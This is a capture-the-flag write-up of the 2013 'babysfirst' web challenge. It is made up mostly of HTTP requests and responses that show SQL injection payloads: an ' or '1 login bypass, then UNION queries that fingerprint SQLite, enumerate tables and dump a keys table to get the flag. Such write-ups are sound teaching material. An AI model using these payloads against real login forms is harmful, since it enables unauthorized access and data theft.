URL: http://babysfirst.shallweplayaga.me:8041
Type: SQL injection
Solution: literally online lolling on line WucGesJi
Let’s inspect HTTP headers setting username with admin
and empty password :
POST /login HTTP/1.1 Host: babysfirst.shallweplayaga.me Content-Type: application/x-www-form-urlencoded Content-Length: 24 username=admin&password= -------------------------------------------------------------------- HTTP/1.1 403 Forbidden Date: Mon, 17 Jun 2013 15:54:46 GMT Transfer-Encoding: chunked X-Sql: select name from users where name = 'admin' and password = '' limit 1; Content-Type: text/html; charset=utf-8
Result is forbidden, but X-Sql:
header gives us the queried SQL statement! Let’s try a basic SQL injection:
POST /login HTTP/1.1 Host: babysfirst.shallweplayaga.me Content-Type: application/x-www-form-urlencoded Content-Length: 31 username=admin&password='+or+'1 -------------------------------------------------------------------- HTTP/1.1 200 OK Date: Mon, 17 Jun 2013 15:58:29 GMT Transfer-Encoding: chunked X-Sql: select name from users where name = 'admin' and password = '' or '1' limit 1; Content-Type: text/html; charset=utf-8
success!
logged in as root
So it’s vulnerable but we have to found the key…
- First i thought it was the root password but it doesn’t work:
username=admin&password=' union select password from users --
-> logged in as barking up the wrong tree - So i tried to find which SQL engine was used. I got a successful hit with sqlite:
username=admin&password=' union select sqlite_version() --
-> logged in as 3.7.9 - We can then list all the tables:
username=admin&password=' union all select name from sqlite_master --
-> logged in as keys
and then displaykeys
table:
username=admin&password=' union all select * from keys --
-> logged in as The key is: literally online lolling on line WucGesJi